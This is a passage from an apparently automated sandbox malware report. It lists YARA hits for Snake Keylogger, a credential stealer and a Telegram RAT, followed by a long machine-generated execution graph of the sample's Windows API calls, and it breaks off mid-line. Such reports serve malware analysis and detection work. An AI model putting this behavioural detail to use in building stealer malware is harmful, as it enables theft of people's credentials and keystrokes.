                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.6%
                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                  Signature Coverage:9.6%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:34
                                                                                  execution_graph 86175 4010e0 86178 401100 86175->86178 86177 4010f8 86179 401113 86178->86179 86181 401184 86179->86181 86182 40114c 86179->86182 86188 401120 86179->86188 86209 401182 86179->86209 86180 40112c DefWindowProcW 86180->86177 86216 401250 86181->86216 86183 401151 86182->86183 86184 40119d 86182->86184 86186 401219 86183->86186 86187 40115d 86183->86187 86190 4011a3 86184->86190 86191 42afb4 86184->86191 86186->86188 86194 401225 86186->86194 86192 401163 86187->86192 86193 42b01d 86187->86193 86188->86180 86237 401000 Shell_NotifyIconW setSBUpLow 86188->86237 86189 401193 86189->86177 86190->86188 86200 4011b6 KillTimer 86190->86200 86201 4011db SetTimer RegisterWindowMessageW 86190->86201 86232 40f190 10 API calls 86191->86232 86197 42afe9 86192->86197 86198 40116c 86192->86198 86193->86180 86236 4370f4 52 API calls 86193->86236 86248 468b0e 74 API calls setSBUpLow 86194->86248 86234 40f190 10 API calls 86197->86234 86198->86188 86204 401174 86198->86204 86199 42b04f 86238 40e0c0 86199->86238 86231 401000 Shell_NotifyIconW setSBUpLow 86200->86231 86201->86189 86202 401204 CreatePopupMenu 86201->86202 86202->86177 86233 45fd57 65 API calls setSBUpLow 86204->86233 86209->86180 86210 42afe4 86210->86189 86211 42b00e 86235 401a50 330 API calls 86211->86235 86212 4011c9 PostQuitMessage 86212->86177 86215 42afdc 86215->86180 86215->86210 86217 4012e8 86216->86217 86218 401262 setSBUpLow 86216->86218 86217->86189 86249 401b80 86218->86249 86220 40128c 86221 4012d1 KillTimer SetTimer 86220->86221 86222 4012bb 86220->86222 86223 4272ec 86220->86223 86221->86217 86224 4012c5 86222->86224 86225 42733f 86222->86225 86226 4272f4 Shell_NotifyIconW 86223->86226 86227 42731a Shell_NotifyIconW 86223->86227 86224->86221 86228 427393 Shell_NotifyIconW 86224->86228 86229 427348 Shell_NotifyIconW 86225->86229 86230 42736e Shell_NotifyIconW 86225->86230 86226->86221 86227->86221 86228->86221 86229->86221 86230->86221 86231->86212 86232->86189 86233->86215 86234->86211 86235->86209 86236->86209 86237->86199 86240 40e0e7 setSBUpLow 86238->86240 86239 40e142 86245 40e184 86239->86245 86347 4341e6 63 API calls __wcsicoll 86239->86347 86240->86239 86241 42729f DestroyIcon 86240->86241 86241->86239 86243 40e1a0 Shell_NotifyIconW 86246 401b80 54 API calls 86243->86246 86244 4272db Shell_NotifyIconW 86245->86243 86245->86244 86247 40e1ba 86246->86247 86247->86209 86248->86210 86250 401b9c 86249->86250 86270 401c7e 86249->86270 86271 4013c0 86250->86271 86253 42722b LoadStringW 86256 427246 86253->86256 86254 401bb9 86276 402160 86254->86276 86290 40e0a0 86256->86290 86257 401bcd 86259 427258 86257->86259 86260 401bda 86257->86260 86294 40d200 52 API calls 2 library calls 86259->86294 86260->86256 86261 401be4 86260->86261 86289 40d200 52 API calls 2 library calls 86261->86289 86264 427267 86265 42727b 86264->86265 86266 401bf3 setSBUpLow _wcscpy _wcsncpy 86264->86266 86295 40d200 52 API calls 2 library calls 86265->86295 86269 401c62 Shell_NotifyIconW 86266->86269 86268 427289 86269->86270 86270->86220 86296 4115d7 86271->86296 86277 426daa 86276->86277 86278 40216b _wcslen 86276->86278 86334 40c600 86277->86334 86281 402180 86278->86281 86282 40219e 86278->86282 86280 426db5 86280->86257 86333 403bd0 52 API calls moneypunct 86281->86333 86284 4013a0 52 API calls 86282->86284 86285 4021a5 86284->86285 86287 426db7 86285->86287 86288 4115d7 52 API calls 86285->86288 86286 402187 _memmove 86286->86257 86288->86286 86289->86266 86291 40e0b2 86290->86291 86292 40e0a8 86290->86292 86291->86266 86346 403c30 52 API calls _memmove 86292->86346 86294->86264 86295->86268 86298 4115e1 _malloc 86296->86298 86299 4013e4 86298->86299 86302 4115fd std::exception::exception 86298->86302 86310 4135bb 86298->86310 86307 4013a0 86299->86307 86300 41163b 86325 4180af 46 API calls std::exception::operator= 86300->86325 86302->86300 86324 41130a 51 API calls __cinit 86302->86324 86303 411645 86326 418105 RaiseException 86303->86326 86306 411656 86308 4115d7 52 API calls 86307->86308 86309 4013a7 86308->86309 86309->86253 86309->86254 86311 413638 _malloc 86310->86311 86320 4135c9 _malloc 86310->86320 86332 417f77 46 API calls __getptd_noexit 86311->86332 86314 4135f7 RtlAllocateHeap 86314->86320 86323 413630 86314->86323 86316 413624 86330 417f77 46 API calls __getptd_noexit 86316->86330 86319 4135d4 86319->86320 86327 418901 46 API calls __NMSG_WRITE 86319->86327 86328 418752 46 API calls 6 library calls 86319->86328 86329 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86319->86329 86320->86314 86320->86316 86320->86319 86321 413622 86320->86321 86331 417f77 46 API calls __getptd_noexit 86321->86331 86323->86298 86324->86300 86325->86303 86326->86306 86327->86319 86328->86319 86330->86321 86331->86323 86332->86323 86333->86286 86335 40c619 86334->86335 86336 40c60a 86334->86336 86335->86280 86336->86335 86339 4026f0 86336->86339 86338 426d7a _memmove 86338->86280 86340 426873 86339->86340 86341 4026ff 86339->86341 86342 4013a0 52 API calls 86340->86342 86341->86338 86343 42687b 86342->86343 86344 4115d7 52 API calls 86343->86344 86345 42689e _memmove 86344->86345 86345->86338 86346->86291 86347->86245 86348 40bd20 86352 428194 86348->86352 86356 40bd2d 86348->86356 86349 40bd43 86351 4281bc 86370 45e987 86 API calls moneypunct 86351->86370 86352->86349 86352->86351 86355 4281b2 86352->86355 86369 40b510 VariantClear 86355->86369 86357 40bd37 86356->86357 86371 4531b1 85 API calls 5 library calls 86356->86371 86360 40bd50 86357->86360 86359 4281ba 86361 426cf1 86360->86361 86362 40bd63 86360->86362 86381 44cde9 52 API calls _memmove 86361->86381 86372 40bd80 86362->86372 86365 426cfc 86367 40e0a0 52 API calls 86365->86367 86366 40bd73 86366->86349 86368 426d02 86367->86368 86369->86359 86370->86356 86371->86357 86373 40bd8e 86372->86373 86374 40bdb7 _memmove 86372->86374 86373->86374 86375 40bded 86373->86375 86376 40bdad 86373->86376 86374->86366 86378 4115d7 52 API calls 86375->86378 86382 402f00 86376->86382 86379 40bdf6 86378->86379 86379->86374 86380 4115d7 52 API calls 86379->86380 86380->86374 86381->86365 86383 402f10 86382->86383 86384 402f0c 86382->86384 86385 4268c3 86383->86385 86386 4115d7 52 API calls 86383->86386 86384->86374 86387 402f51 moneypunct _memmove 86386->86387 86387->86374 86388 425ba2 86393 40e360 86388->86393 86390 425bb4 86409 41130a 51 API calls __cinit 86390->86409 86392 425bbe 86394 4115d7 52 API calls 86393->86394 86395 40e3ec GetModuleFileNameW 86394->86395 86410 413a0e 86395->86410 86397 40e421 _wcsncat 86413 413a9e 86397->86413 86400 4115d7 52 API calls 86401 40e45e _wcscpy 86400->86401 86416 40bc70 86401->86416 86405 40e4a9 86405->86390 86406 401c90 52 API calls 86408 40e4a1 _wcscat _wcslen _wcsncpy 86406->86408 86407 4115d7 52 API calls 86407->86408 86408->86405 86408->86406 86408->86407 86409->86392 86435 413801 86410->86435 86465 419efd 86413->86465 86417 4115d7 52 API calls 86416->86417 86418 40bc98 86417->86418 86419 4115d7 52 API calls 86418->86419 86420 40bca6 86419->86420 86421 40e4c0 86420->86421 86477 403350 86421->86477 86423 40e4cb RegOpenKeyExW 86424 427190 RegQueryValueExW 86423->86424 86425 40e4eb 86423->86425 86426 4271b0 86424->86426 86427 42721a RegCloseKey 86424->86427 86425->86408 86428 4115d7 52 API calls 86426->86428 86427->86408 86429 4271cb 86428->86429 86484 43652f 52 API calls 86429->86484 86431 4271d8 RegQueryValueExW 86432 42720e 86431->86432 86433 4271f7 86431->86433 86432->86427 86434 402160 52 API calls 86433->86434 86434->86432 86436 41381a 86435->86436 86437 41389e 86435->86437 86436->86437 86449 41388a 86436->86449 86457 419e30 46 API calls _sprintf 86436->86457 86438 4139e8 86437->86438 86440 413a00 86437->86440 86462 417f77 46 API calls __getptd_noexit 86438->86462 86464 417f77 46 API calls __getptd_noexit 86440->86464 86441 4139ed 86463 417f25 10 API calls _sprintf 86441->86463 86445 41396c 86445->86437 86447 413967 86445->86447 86450 41397a 86445->86450 86446 413929 86446->86437 86448 413945 86446->86448 86459 419e30 46 API calls _sprintf 86446->86459 86447->86397 86448->86437 86448->86447 86453 41395b 86448->86453 86449->86437 86456 413909 86449->86456 86458 419e30 46 API calls _sprintf 86449->86458 86461 419e30 46 API calls _sprintf 86450->86461 86460 419e30 46 API calls _sprintf 86453->86460 86456->86445 86456->86446 86457->86449 86458->86456 86459->86448 86460->86447 86461->86447 86462->86441 86463->86447 86464->86447 86466 419f13 86465->86466 86467 419f0e 86465->86467 86474 417f77 46 API calls __getptd_noexit 86466->86474 86467->86466 86470 419f2b 86467->86470 86469 419f18 86475 417f25 10 API calls _sprintf 86469->86475 86472 40e454 86470->86472 86476 417f77 46 API calls __getptd_noexit 86470->86476 86472->86400 86474->86469 86475->86472 86476->86469 86478 403367 86477->86478 86479 403358 86477->86479 86480 4115d7 52 API calls 86478->86480 86479->86423 86481 403370 86480->86481 86482 4115d7 52 API calls 86481->86482 86483 40339e 86482->86483 86483->86423 86484->86431 86485 3faac58 86499 3fa88a8 86485->86499 86487 3faace3 86502 3faab48 86487->86502 86505 3fabd08 GetPEB 86499->86505 86501 3fa8f33 86501->86487 86503 3faab51 Sleep 86502->86503 86504 3faab5f 86503->86504 86506 3fabd32 86505->86506 86506->86501 86507 416454 86544 416c70 86507->86544 86509 416460 GetStartupInfoW 86510 416474 86509->86510 86545 419d5a HeapCreate 86510->86545 86512 4164cd 86513 4164d8 86512->86513 86629 41642b 46 API calls 3 library calls 86512->86629 86546 417c20 GetModuleHandleW 86513->86546 86516 4164de 86517 4164e9 __RTC_Initialize 86516->86517 86630 41642b 46 API calls 3 library calls 86516->86630 86565 41aaa1 GetStartupInfoW 86517->86565 86521 416503 GetCommandLineW 86578 41f584 GetEnvironmentStringsW 86521->86578 86525 416513 86584 41f4d6 GetModuleFileNameW 86525->86584 86527 41651d 86528 416528 86527->86528 86632 411924 46 API calls 3 library calls 86527->86632 86588 41f2a4 86528->86588 86531 41652e 86532 416539 86531->86532 86633 411924 46 API calls 3 library calls 86531->86633 86602 411703 86532->86602 86535 416541 86536 41654c __wwincmdln 86535->86536 86634 411924 46 API calls 3 library calls 86535->86634 86606 40d6b0 86536->86606 86540 41657c 86636 411906 46 API calls _doexit 86540->86636 86543 416581 __tsopen_nolock 86544->86509 86545->86512 86547 417c34 86546->86547 86548 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86546->86548 86637 4178ff 49 API calls _free 86547->86637 86550 417c87 TlsAlloc 86548->86550 86553 417cd5 TlsSetValue 86550->86553 86554 417d96 86550->86554 86551 417c39 86551->86516 86553->86554 86555 417ce6 __init_pointers 86553->86555 86554->86516 86638 418151 InitializeCriticalSectionAndSpinCount 86555->86638 86557 417d91 86646 4178ff 49 API calls _free 86557->86646 86559 417d2a 86559->86557 86639 416b49 86559->86639 86562 417d76 86645 41793c 46 API calls 4 library calls 86562->86645 86564 417d7e GetCurrentThreadId 86564->86554 86566 416b49 __calloc_crt 46 API calls 86565->86566 86575 41aabf 86566->86575 86567 41ac6a GetStdHandle 86572 41ac34 86567->86572 86568 416b49 __calloc_crt 46 API calls 86568->86575 86569 41acce SetHandleCount 86577 4164f7 86569->86577 86570 41ac7c GetFileType 86570->86572 86571 41abb4 86571->86572 86573 41abe0 GetFileType 86571->86573 86574 41abeb InitializeCriticalSectionAndSpinCount 86571->86574 86572->86567 86572->86569 86572->86570 86576 41aca2 InitializeCriticalSectionAndSpinCount 86572->86576 86573->86571 86573->86574 86574->86571 86574->86577 86575->86568 86575->86571 86575->86572 86575->86577 86576->86572 86576->86577 86577->86521 86631 411924 46 API calls 3 library calls 86577->86631 86579 41f595 86578->86579 86580 41f599 86578->86580 86579->86525 86656 416b04 86580->86656 86582 41f5bb _memmove 86583 41f5c2 FreeEnvironmentStringsW 86582->86583 86583->86525 86585 41f50b _wparse_cmdline 86584->86585 86586 416b04 __malloc_crt 46 API calls 86585->86586 86587 41f54e _wparse_cmdline 86585->86587 86586->86587 86587->86527 86589 41f2bc _wcslen 86588->86589 86593 41f2b4 86588->86593 86590 416b49 __calloc_crt 46 API calls 86589->86590 86595 41f2e0 _wcslen 86590->86595 86591 41f336 86663 413748 86591->86663 86593->86531 86594 416b49 __calloc_crt 46 API calls 86594->86595 86595->86591 86595->86593 86595->86594 86596 41f35c 86595->86596 86599 41f373 86595->86599 86662 41ef12 46 API calls _sprintf 86595->86662 86597 413748 _free 46 API calls 86596->86597 86597->86593 86669 417ed3 86599->86669 86601 41f37f 86601->86531 86603 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86602->86603 86605 411750 __IsNonwritableInCurrentImage 86603->86605 86688 41130a 51 API calls __cinit 86603->86688 86605->86535 86607 42e2f3 86606->86607 86608 40d6cc 86606->86608 86689 408f40 86608->86689 86610 40d707 86693 40ebb0 86610->86693 86613 40d737 86696 411951 86613->86696 86618 40d751 86708 40f4e0 SystemParametersInfoW SystemParametersInfoW 86618->86708 86620 40d75f 86709 40d590 GetCurrentDirectoryW 86620->86709 86622 40d767 SystemParametersInfoW 86623 40d794 86622->86623 86624 40d78d FreeLibrary 86622->86624 86625 408f40 VariantClear 86623->86625 86624->86623 86626 40d79d 86625->86626 86627 408f40 VariantClear 86626->86627 86628 40d7a6 86627->86628 86628->86540 86635 4118da 46 API calls _doexit 86628->86635 86629->86513 86630->86517 86635->86540 86636->86543 86637->86551 86638->86559 86641 416b52 86639->86641 86642 416b8f 86641->86642 86643 416b70 Sleep 86641->86643 86647 41f677 86641->86647 86642->86557 86642->86562 86644 416b85 86643->86644 86644->86641 86644->86642 86645->86564 86646->86554 86648 41f683 86647->86648 86654 41f69e _malloc 86647->86654 86649 41f68f 86648->86649 86648->86654 86655 417f77 46 API calls __getptd_noexit 86649->86655 86651 41f6b1 HeapAlloc 86653 41f6d8 86651->86653 86651->86654 86652 41f694 86652->86641 86653->86641 86654->86651 86654->86653 86655->86652 86659 416b0d 86656->86659 86657 4135bb _malloc 45 API calls 86657->86659 86658 416b43 86658->86582 86659->86657 86659->86658 86660 416b24 Sleep 86659->86660 86661 416b39 86660->86661 86661->86658 86661->86659 86662->86595 86664 413753 RtlFreeHeap 86663->86664 86668 41377c _free 86663->86668 86665 413768 86664->86665 86664->86668 86672 417f77 46 API calls __getptd_noexit 86665->86672 86667 41376e GetLastError 86667->86668 86668->86593 86673 417daa 86669->86673 86672->86667 86674 417dc9 setSBUpLow __call_reportfault 86673->86674 86675 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86674->86675 86676 417eb5 __call_reportfault 86675->86676 86679 41a208 86676->86679 86678 417ed1 GetCurrentProcess TerminateProcess 86678->86601 86680 41a210 86679->86680 86681 41a212 IsDebuggerPresent 86679->86681 86680->86678 86687 41fe19 86681->86687 86684 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86685 421ff0 __call_reportfault 86684->86685 86686 421ff8 GetCurrentProcess TerminateProcess 86684->86686 86685->86686 86686->86678 86687->86684 86688->86605 86692 408f48 moneypunct 86689->86692 86690 4265c7 VariantClear 86691 408f55 moneypunct 86690->86691 86691->86610 86692->86690 86692->86691 86749 40ebd0 86693->86749 86753 4182cb 86696->86753 86698 41195e 86760 4181f2 LeaveCriticalSection 86698->86760 86700 40d748 86701 4119b0 86700->86701 86702 4119d6 86701->86702 86703 4119bc 86701->86703 86702->86618 86703->86702 86795 417f77 46 API calls __getptd_noexit 86703->86795 86705 4119c6 86796 417f25 10 API calls _sprintf 86705->86796 86707 4119d1 86707->86618 86708->86620 86797 401f20 86709->86797 86711 40d5b6 IsDebuggerPresent 86712 40d5c4 86711->86712 86713 42e1bb MessageBoxA 86711->86713 86714 42e1d4 86712->86714 86715 40d5e3 86712->86715 86713->86714 86969 403a50 52 API calls 3 library calls 86714->86969 86867 40f520 86715->86867 86719 40d5fd GetFullPathNameW 86879 401460 86719->86879 86721 40d63b 86722 40d643 86721->86722 86723 42e231 SetCurrentDirectoryW 86721->86723 86724 40d64c 86722->86724 86970 432fee 6 API calls 86722->86970 86723->86722 86894 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86724->86894 86727 42e252 86727->86724 86730 42e25a GetModuleFileNameW 86727->86730 86732 42e274 86730->86732 86733 42e2cb GetForegroundWindow ShellExecuteW 86730->86733 86731 40d656 86734 40d669 86731->86734 86738 40e0c0 74 API calls 86731->86738 86971 401b10 86732->86971 86735 40d688 86733->86735 86902 4091e0 86734->86902 86742 40d692 SetCurrentDirectoryW 86735->86742 86738->86734 86742->86622 86743 42e28d 86978 40d200 52 API calls 2 library calls 86743->86978 86746 42e299 GetForegroundWindow ShellExecuteW 86747 42e2c6 86746->86747 86747->86735 86748 40ec00 LoadLibraryA GetProcAddress 86748->86613 86750 40d72e 86749->86750 86751 40ebd6 LoadLibraryA 86749->86751 86750->86613 86750->86748 86751->86750 86752 40ebe7 GetProcAddress 86751->86752 86752->86750 86754 4182e0 86753->86754 86755 4182f3 EnterCriticalSection 86753->86755 86761 418209 86754->86761 86755->86698 86757 4182e6 86757->86755 86788 411924 46 API calls 3 library calls 86757->86788 86760->86700 86762 418215 __tsopen_nolock 86761->86762 86763 418225 86762->86763 86764 41823d 86762->86764 86789 418901 46 API calls __NMSG_WRITE 86763->86789 86766 416b04 __malloc_crt 45 API calls 86764->86766 86773 41824b __tsopen_nolock 86764->86773 86768 418256 86766->86768 86767 41822a 86790 418752 46 API calls 6 library calls 86767->86790 86771 41825d 86768->86771 86772 41826c 86768->86772 86770 418231 86791 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86770->86791 86792 417f77 46 API calls __getptd_noexit 86771->86792 86776 4182cb __lock 45 API calls 86772->86776 86773->86757 86778 418273 86776->86778 86779 4182a6 86778->86779 86780 41827b InitializeCriticalSectionAndSpinCount 86778->86780 86781 413748 _free 45 API calls 86779->86781 86782 41828b 86780->86782 86787 418297 86780->86787 86781->86787 86783 413748 _free 45 API calls 86782->86783 86784 418291 86783->86784 86793 417f77 46 API calls __getptd_noexit 86784->86793 86794 4182c2 LeaveCriticalSection _doexit 86787->86794 86789->86767 86790->86770 86792->86773 86793->86787 86794->86773 86795->86705 86796->86707 86979 40e6e0 86797->86979 86801 401f41 GetModuleFileNameW 86997 410100 86801->86997 86803 401f5c 87009 410960 86803->87009 86806 401b10 52 API calls 86807 401f81 86806->86807 87012 401980 86807->87012 86809 401f8e 86810 408f40 VariantClear 86809->86810 86811 401f9d 86810->86811 86812 401b10 52 API calls 86811->86812 86813 401fb4 86812->86813 86814 401980 53 API calls 86813->86814 86815 401fc3 86814->86815 86816 401b10 52 API calls 86815->86816 86817 401fd2 86816->86817 87020 40c2c0 86817->87020 86819 401fe1 86820 40bc70 52 API calls 86819->86820 86821 401ff3 86820->86821 87038 401a10 86821->87038 86823 401ffe 87045 4114ab 86823->87045 86826 428b05 86828 401a10 52 API calls 86826->86828 86827 402017 86829 4114ab __wcsicoll 58 API calls 86827->86829 86830 428b18 86828->86830 86831 402022 86829->86831 86833 401a10 52 API calls 86830->86833 86831->86830 86832 40202d 86831->86832 86834 4114ab __wcsicoll 58 API calls 86832->86834 86835 428b33 86833->86835 86836 402038 86834->86836 86838 428b3b GetModuleFileNameW 86835->86838 86837 402043 86836->86837 86836->86838 86839 4114ab __wcsicoll 58 API calls 86837->86839 86840 401a10 52 API calls 86838->86840 86841 40204e 86839->86841 86842 428b6c 86840->86842 86843 402092 86841->86843 86847 401a10 52 API calls 86841->86847 86852 428b90 _wcscpy 86841->86852 86844 40e0a0 52 API calls 86842->86844 86846 4020a3 86843->86846 86843->86852 86845 428b7a 86844->86845 86848 401a10 52 API calls 86845->86848 86849 428bc6 86846->86849 87053 40e830 53 API calls 86846->87053 86850 402073 _wcscpy 86847->86850 86851 428b88 86848->86851 86857 401a10 52 API calls 86850->86857 86851->86852 86854 401a10 52 API calls 86852->86854 86862 4020d0 86854->86862 86855 4020bb 87054 40cf00 53 API calls 86855->87054 86857->86843 86858 4020c6 86859 408f40 VariantClear 86858->86859 86859->86862 86861 402110 86864 408f40 VariantClear 86861->86864 86862->86861 86865 401a10 52 API calls 86862->86865 87055 40cf00 53 API calls 86862->87055 87056 40e6a0 53 API calls 86862->87056 86866 402120 moneypunct 86864->86866 86865->86862 86866->86711 86868 4295c9 setSBUpLow 86867->86868 86869 40f53c 86867->86869 86871 4295d9 GetOpenFileNameW 86868->86871 87736 410120 86869->87736 86871->86869 86873 40d5f5 86871->86873 86872 40f545 87740 4102b0 SHGetMalloc 86872->87740 86873->86719 86873->86721 86875 40f54c 87745 410190 GetFullPathNameW 86875->87745 86877 40f559 87756 40f570 86877->87756 87818 402400 86879->87818 86881 40146f 86884 428c29 _wcscat 86881->86884 87827 401500 86881->87827 86883 40147c 86883->86884 87835 40d440 86883->87835 86886 401489 86886->86884 86887 401491 GetFullPathNameW 86886->86887 86888 402160 52 API calls 86887->86888 86889 4014bb 86888->86889 86890 402160 52 API calls 86889->86890 86891 4014c8 86890->86891 86891->86884 86892 402160 52 API calls 86891->86892 86893 4014ee 86892->86893 86893->86721 86895 428361 86894->86895 86896 4103fc LoadImageW RegisterClassExW 86894->86896 87855 44395e EnumResourceNamesW LoadImageW 86895->87855 87854 410490 7 API calls 86896->87854 86899 40d651 86901 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86899->86901 86900 428368 86901->86731 86903 409202 86902->86903 86904 42d7ad 86902->86904 86960 409216 moneypunct 86903->86960 88127 410940 330 API calls 86903->88127 88130 45e737 90 API calls 3 library calls 86904->88130 86907 409386 86908 40939c 86907->86908 88128 40f190 10 API calls 86907->88128 86908->86735 86968 401000 Shell_NotifyIconW setSBUpLow 86908->86968 86910 4095b2 86910->86908 86912 4095bf 86910->86912 86911 409253 PeekMessageW 86911->86960 88129 401a50 330 API calls 86912->88129 86914 42d8cd Sleep 86914->86960 86915 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86915->86908 86918 4095f9 86915->86918 86917 42e13b 88148 40d410 VariantClear 86917->88148 86921 42e158 TranslateMessage DispatchMessageW GetMessageW 86918->86921 86921->86921 86923 42e188 86921->86923 86922 409567 PeekMessageW 86922->86960 86923->86908 86926 44c29d 52 API calls 86967 4094e0 86926->86967 86927 40e0a0 52 API calls 86927->86960 86928 46fdbf 108 API calls 86928->86967 86929 46f3c1 107 API calls 86929->86960 86930 409551 TranslateMessage DispatchMessageW 86930->86922 86932 42dcd2 WaitForSingleObject 86934 42dcf0 GetExitCodeProcess CloseHandle 86932->86934 86932->86960 86933 42dd3d Sleep 86933->86967 88137 40d410 VariantClear 86934->88137 86938 4094cf Sleep 86938->86967 86939 40c620 timeGetTime 86939->86967 86940 42d94d timeGetTime 88133 465124 53 API calls 86940->88133 86942 40d410 VariantClear 86942->86960 86945 465124 53 API calls 86945->86967 86947 42dd89 CloseHandle 86947->86967 86948 47d33e 308 API calls 86948->86960 86950 408f40 VariantClear 86950->86967 86951 42de19 GetExitCodeProcess CloseHandle 86951->86967 86954 42de88 Sleep 86954->86960 86957 45e737 90 API calls 86957->86960 86960->86907 86960->86911 86960->86914 86960->86917 86960->86922 86960->86927 86960->86929 86960->86930 86960->86932 86960->86933 86960->86938 86960->86940 86960->86942 86960->86948 86960->86957 86961 42e0cc VariantClear 86960->86961 86962 408f40 VariantClear 86960->86962 86960->86967 87856 4091b0 86960->87856 87914 40afa0 86960->87914 87940 408fc0 86960->87940 87975 408cc0 86960->87975 87989 40d150 86960->87989 87994 40d170 86960->87994 88000 4096a0 86960->88000 88131 465124 53 API calls 86960->88131 88132 40c620 timeGetTime 86960->88132 88147 40e270 VariantClear moneypunct 86960->88147 86961->86960 86962->86960 86964 401980 53 API calls 86964->86967 86965 401b10 52 API calls 86965->86967 86967->86926 86967->86928 86967->86939 86967->86945 86967->86947 86967->86950 86967->86951 86967->86954 86967->86960 86967->86964 86967->86965 88134 45178a 54 API calls 86967->88134 88135 47d33e 330 API calls 86967->88135 88136 453bc6 54 API calls 86967->88136 88138 40d410 VariantClear 86967->88138 88139 443d19 67 API calls _wcslen 86967->88139 88140 4574b4 VariantClear 86967->88140 88141 403cd0 86967->88141 88145 4731e1 VariantClear 86967->88145 88146 4331a2 6 API calls 86967->88146 86968->86735 86969->86721 86970->86727 86972 401b16 _wcslen 86971->86972 86973 4115d7 52 API calls 86972->86973 86974 401b63 86972->86974 86975 401b4b _memmove 86973->86975 86977 40d200 52 API calls 2 library calls 86974->86977 86976 4115d7 52 API calls 86975->86976 86976->86974 86977->86743 86978->86746 86980 40bc70 52 API calls 86979->86980 86981 401f31 86980->86981 86982 402560 86981->86982 86983 40256d __write_nolock 86982->86983 86984 402160 52 API calls 86983->86984 86986 402593 86984->86986 86993 4025bd 86986->86993 87057 401c90 86986->87057 86987 4026f0 52 API calls 86987->86993 86988 4026a7 86989 401b10 52 API calls 86988->86989 86996 4026db 86988->86996 86991 4026d1 86989->86991 86990 401b10 52 API calls 86990->86993 87061 40d7c0 52 API calls 2 library calls 86991->87061 86992 401c90 52 API calls 86992->86993 86993->86987 86993->86988 86993->86990 86993->86992 87060 40d7c0 52 API calls 2 library calls 86993->87060 86996->86801 87062 40f760 86997->87062 87000 410118 87000->86803 87002 42805d 87003 42806a 87002->87003 87118 431e58 87002->87118 87005 413748 _free 46 API calls 87003->87005 87006 428078 87005->87006 87007 431e58 82 API calls 87006->87007 87008 428084 87007->87008 87008->86803 87010 4115d7 52 API calls 87009->87010 87011 401f74 87010->87011 87011->86806 87013 4019a3 87012->87013 87014 401985 87012->87014 87013->87014 87015 4019b8 87013->87015 87017 40199f 87014->87017 87724 403e10 53 API calls 87014->87724 87725 403e10 53 API calls 87015->87725 87017->86809 87019 4019c4 87019->86809 87021 40c2c7 87020->87021 87022 40c30e 87020->87022 87023 40c2d3 87021->87023 87024 426c79 87021->87024 87025 40c315 87022->87025 87026 426c2b 87022->87026 87726 403ea0 52 API calls __cinit 87023->87726 87731 4534e3 52 API calls 87024->87731 87030 40c321 87025->87030 87031 426c5a 87025->87031 87028 426c4b 87026->87028 87029 426c2e 87026->87029 87729 4534e3 52 API calls 87028->87729 87036 40c2de 87029->87036 87728 4534e3 52 API calls 87029->87728 87727 403ea0 52 API calls __cinit 87030->87727 87730 4534e3 52 API calls 87031->87730 87036->86819 87039 401a30 87038->87039 87040 401a17 87038->87040 87041 402160 52 API calls 87039->87041 87042 401a2d 87040->87042 87732 403c30 52 API calls _memmove 87040->87732 87044 401a3d 87041->87044 87042->86823 87044->86823 87046 411523 87045->87046 87047 4114ba 87045->87047 87735 4113a8 58 API calls 3 library calls 87046->87735 87049 40200c 87047->87049 87733 417f77 46 API calls __getptd_noexit 87047->87733 87049->86826 87049->86827 87051 4114c6 87734 417f25 10 API calls _sprintf 87051->87734 87053->86855 87054->86858 87055->86862 87056->86862 87058 4026f0 52 API calls 87057->87058 87059 401c97 87058->87059 87059->86986 87060->86993 87061->86996 87122 40f6f0 87062->87122 87064 40f77b _strcat moneypunct 87130 40f850 87064->87130 87069 427c2a 87160 414d04 87069->87160 87071 40f7fc 87071->87069 87072 40f804 87071->87072 87147 414a46 87072->87147 87076 40f80e 87076->87000 87081 4528bd 87076->87081 87078 427c59 87166 414fe2 87078->87166 87080 427c79 87082 4150d1 _fseek 81 API calls 87081->87082 87083 452930 87082->87083 87666 452719 87083->87666 87086 452948 87086->87002 87087 414d04 __fread_nolock 61 API calls 87088 452966 87087->87088 87089 414d04 __fread_nolock 61 API calls 87088->87089 87090 452976 87089->87090 87091 414d04 __fread_nolock 61 API calls 87090->87091 87092 45298f 87091->87092 87093 414d04 __fread_nolock 61 API calls 87092->87093 87094 4529aa 87093->87094 87095 4150d1 _fseek 81 API calls 87094->87095 87096 4529c4 87095->87096 87097 4135bb _malloc 46 API calls 87096->87097 87098 4529cf 87097->87098 87099 4135bb _malloc 46 API calls 87098->87099 87100 4529db 87099->87100 87101 414d04 __fread_nolock 61 API calls 87100->87101 87102 4529ec 87101->87102 87103 44afef GetSystemTimeAsFileTime 87102->87103 87104 452a00 87103->87104 87105 452a36 87104->87105 87106 452a13 87104->87106 87108 452aa5 87105->87108 87109 452a3c 87105->87109 87107 413748 _free 46 API calls 87106->87107 87110 452a1c 87107->87110 87112 413748 _free 46 API calls 87108->87112 87672 44b1a9 87109->87672 87113 413748 _free 46 API 